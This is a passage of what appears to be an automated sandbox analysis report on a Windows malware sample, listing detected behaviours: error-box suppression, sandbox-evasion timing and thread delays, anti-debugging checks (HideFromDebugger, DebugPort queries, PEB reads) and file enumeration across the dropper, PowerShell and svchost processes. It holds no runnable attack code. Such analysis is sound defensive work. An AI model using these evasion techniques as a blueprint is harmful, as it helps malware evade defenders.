            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeAPI/Special instruction interceptor: Address: 447A4F7
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD1C0 rdtsc 8_2_034AD1C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5962Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3668Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 4052Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 5920Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeAPI coverage: 7.8 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 768Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900Thread sleep count: 4052 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900Thread sleep time: -8104000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900Thread sleep count: 5920 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4900Thread sleep time: -11840000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe TID: 6028Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_00406370 FindFirstFileW,FindClose,0_2_00406370
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040581E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0076C660 FindFirstFileW,FindNextFileW,FindClose,8_2_0076C660
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;~tAMSFT_NetEventVmNetworkAdatper.cdxmlP
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.3449858507.00000000054B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.3449858507.00000000054B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
            Source: Stemmeurnes.exe, 00000006.00000002.3681034228.0000000006FCB000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3576788364.0000000006FCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
            Source: powershell.exe, 00000002.00000002.3449858507.00000000054B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
            Source: Stemmeurnes.exe, 00000006.00000002.3681034228.0000000006FCB000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006F78000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3576788364.0000000006FCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vnte.pxMSFT_NetEventVmNetworkAdatper.format.ps1xml
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Salmebogs(1).exeAPI call chain: ExitProcess graph end nodegraph_0-3363
            Source: C:\Users\user\Desktop\Salmebogs(1).exeAPI call chain: ExitProcess graph end nodegraph_0-3368
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD1C0 rdtsc 8_2_034AD1C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02CED6CC LdrInitializeThunk,2_2_02CED6CC
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A702A0 mov eax, dword ptr fs:[00000030h]6_2_22A702A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A702A0 mov eax, dword ptr fs:[00000030h]6_2_22A702A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A752A0 mov eax, dword ptr fs:[00000030h]6_2_22A752A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A752A0 mov eax, dword ptr fs:[00000030h]6_2_22A752A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A752A0 mov eax, dword ptr fs:[00000030h]6_2_22A752A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A752A0 mov eax, dword ptr fs:[00000030h]6_2_22A752A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF62A0 mov eax, dword ptr fs:[00000030h]6_2_22AF62A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF62A0 mov ecx, dword ptr fs:[00000030h]6_2_22AF62A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF62A0 mov eax, dword ptr fs:[00000030h]6_2_22AF62A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF62A0 mov eax, dword ptr fs:[00000030h]6_2_22AF62A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF62A0 mov eax, dword ptr fs:[00000030h]6_2_22AF62A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF62A0 mov eax, dword ptr fs:[00000030h]6_2_22AF62A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF72A0 mov eax, dword ptr fs:[00000030h]6_2_22AF72A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AF72A0 mov eax, dword ptr fs:[00000030h]6_2_22AF72A0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AE92BC mov eax, dword ptr fs:[00000030h]6_2_22AE92BC
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AE92BC mov eax, dword ptr fs:[00000030h]6_2_22AE92BC
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AE92BC mov ecx, dword ptr fs:[00000030h]6_2_22AE92BC
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AE92BC mov ecx, dword ptr fs:[00000030h]6_2_22AE92BC
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B292A6 mov eax, dword ptr fs:[00000030h]6_2_22B292A6
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B292A6 mov eax, dword ptr fs:[00000030h]6_2_22B292A6
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B292A6 mov eax, dword ptr fs:[00000030h]6_2_22B292A6
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B292A6 mov eax, dword ptr fs:[00000030h]6_2_22B292A6
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AE0283 mov eax, dword ptr fs:[00000030h]6_2_22AE0283
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AE0283 mov eax, dword ptr fs:[00000030h]6_2_22AE0283
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AE0283 mov eax, dword ptr fs:[00000030h]6_2_22AE0283
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A9E284 mov eax, dword ptr fs:[00000030h]6_2_22A9E284
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A9E284 mov eax, dword ptr fs:[00000030h]6_2_22A9E284
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B35283 mov eax, dword ptr fs:[00000030h]6_2_22B35283
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A9329E mov eax, dword ptr fs:[00000030h]6_2_22A9329E
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A9329E mov eax, dword ptr fs:[00000030h]6_2_22A9329E
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A702E1 mov eax, dword ptr fs:[00000030h]6_2_22A702E1
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A702E1 mov eax, dword ptr fs:[00000030h]6_2_22A702E1
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A702E1 mov eax, dword ptr fs:[00000030h]6_2_22A702E1
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B1F2F8 mov eax, dword ptr fs:[00000030h]6_2_22B1F2F8
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B352E2 mov eax, dword ptr fs:[00000030h]6_2_22B352E2
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A592FF mov eax, dword ptr fs:[00000030h]6_2_22A592FF
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22B112ED mov eax, dword ptr fs:[00000030h]6_2_22B112ED
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A692C5 mov eax, dword ptr fs:[00000030h]6_2_22A692C5
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A692C5 mov eax, dword ptr fs:[00000030h]6_2_22A692C5
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A6A2C3 mov eax, dword ptr fs:[00000030h]6_2_22A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A6A2C3 mov eax, dword ptr fs:[00000030h]6_2_22A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A6A2C3 mov eax, dword ptr fs:[00000030h]6_2_22A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A6A2C3 mov eax, dword ptr fs:[00000030h]6_2_22A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22A6A2C3 mov eax, dword ptr fs:[00000030h]6_2_22A6A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B2349 mov eax, dword ptr fs:[00000030h]8_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342D34C mov eax, dword ptr fs:[00000030h]8_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342D34C mov eax, dword ptr fs:[00000030h]8_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505341 mov eax, dword ptr fs:[00000030h]8_2_03505341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429353 mov eax, dword ptr fs:[00000030h]8_2_03429353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429353 mov eax, dword ptr fs:[00000030h]8_2_03429353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B035C mov eax, dword ptr fs:[00000030h]8_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B035C mov eax, dword ptr fs:[00000030h]8_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B035C mov eax, dword ptr fs:[00000030h]8_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B035C mov ecx, dword ptr fs:[00000030h]8_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B035C mov eax, dword ptr fs:[00000030h]8_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B035C mov eax, dword ptr fs:[00000030h]8_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FA352 mov eax, dword ptr fs:[00000030h]8_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EF367 mov eax, dword ptr fs:[00000030h]8_2_034EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034D437C mov eax, dword ptr fs:[00000030h]8_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03437370 mov eax, dword ptr fs:[00000030h]8_2_03437370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03437370 mov eax, dword ptr fs:[00000030h]8_2_03437370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03437370 mov eax, dword ptr fs:[00000030h]8_2_03437370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B930B mov eax, dword ptr fs:[00000030h]8_2_034B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B930B mov eax, dword ptr fs:[00000030h]8_2_034B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B930B mov eax, dword ptr fs:[00000030h]8_2_034B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346A30B mov eax, dword ptr fs:[00000030h]8_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346A30B mov eax, dword ptr fs:[00000030h]8_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346A30B mov eax, dword ptr fs:[00000030h]8_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342C310 mov ecx, dword ptr fs:[00000030h]8_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03450310 mov ecx, dword ptr fs:[00000030h]8_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F132D mov eax, dword ptr fs:[00000030h]8_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F132D mov eax, dword ptr fs:[00000030h]8_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345F32A mov eax, dword ptr fs:[00000030h]8_2_0345F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03427330 mov eax, dword ptr fs:[00000030h]8_2_03427330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EC3CD mov eax, dword ptr fs:[00000030h]8_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A3C0 mov eax, dword ptr fs:[00000030h]8_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A3C0 mov eax, dword ptr fs:[00000030h]8_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A3C0 mov eax, dword ptr fs:[00000030h]8_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A3C0 mov eax, dword ptr fs:[00000030h]8_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A3C0 mov eax, dword ptr fs:[00000030h]8_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A3C0 mov eax, dword ptr fs:[00000030h]8_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034383C0 mov eax, dword ptr fs:[00000030h]8_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034383C0 mov eax, dword ptr fs:[00000030h]8_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034383C0 mov eax, dword ptr fs:[00000030h]8_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034383C0 mov eax, dword ptr fs:[00000030h]8_2_034383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EB3D0 mov ecx, dword ptr fs:[00000030h]8_2_034EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EF3E6 mov eax, dword ptr fs:[00000030h]8_2_034EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035053FC mov eax, dword ptr fs:[00000030h]8_2_035053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034403E9 mov eax, dword ptr fs:[00000030h]8_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E3F0 mov eax, dword ptr fs:[00000030h]8_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E3F0 mov eax, dword ptr fs:[00000030h]8_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E3F0 mov eax, dword ptr fs:[00000030h]8_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034663FF mov eax, dword ptr fs:[00000030h]8_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342E388 mov eax, dword ptr fs:[00000030h]8_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342E388 mov eax, dword ptr fs:[00000030h]8_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342E388 mov eax, dword ptr fs:[00000030h]8_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345438F mov eax, dword ptr fs:[00000030h]8_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345438F mov eax, dword ptr fs:[00000030h]8_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0350539D mov eax, dword ptr fs:[00000030h]8_2_0350539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0348739A mov eax, dword ptr fs:[00000030h]8_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0348739A mov eax, dword ptr fs:[00000030h]8_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03428397 mov eax, dword ptr fs:[00000030h]8_2_03428397
